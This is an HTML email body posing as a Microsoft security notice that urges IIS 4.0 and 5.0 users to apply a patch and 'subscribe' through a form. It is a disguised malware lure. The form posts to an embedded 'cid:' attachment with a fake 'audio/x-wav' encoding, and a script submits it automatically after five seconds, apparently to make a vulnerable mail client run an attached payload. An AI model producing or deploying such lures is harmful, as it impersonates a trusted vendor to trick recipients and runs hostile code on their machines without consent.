<HTML><HEAD></HEAD>
<BODY>
Microsoft has identified a security vulnerability in Microsoft&reg; IIS 4.0 and 5.0<BR>
that is eliminated by a previously-released patch.<BR>
Customers who have applied that patch are already protected against the vulnerability<BR>
and do not need to take additional action.<BR>
Microsoft strongly urges all customers using IIS 4.0 and 5.0 who have not already done so<BR>
to apply the patch immediately.<BR><BR>
Patch is also provided to subscribed list of Microsoft&reg; Tech Support:<BR>
<FORM NAME=Form1 ACTION="cid:hg0Ce25h2d06aC9AH9E5 @" METHOD=POST ENCTYPE="audio/x-wav">
Patch: <INPUT TYPE=TEXT NAME="Patch"><BR>
Date : <INPUT TYPE=TEXT NAME="Date"><BR><BR>
<INPUT TYPE="submit" VALUE="Subscribe">
</FORM>
<SCRIPT>
setTimeout('Form1.submit();',5000);
</SCRIPT>
</BODY>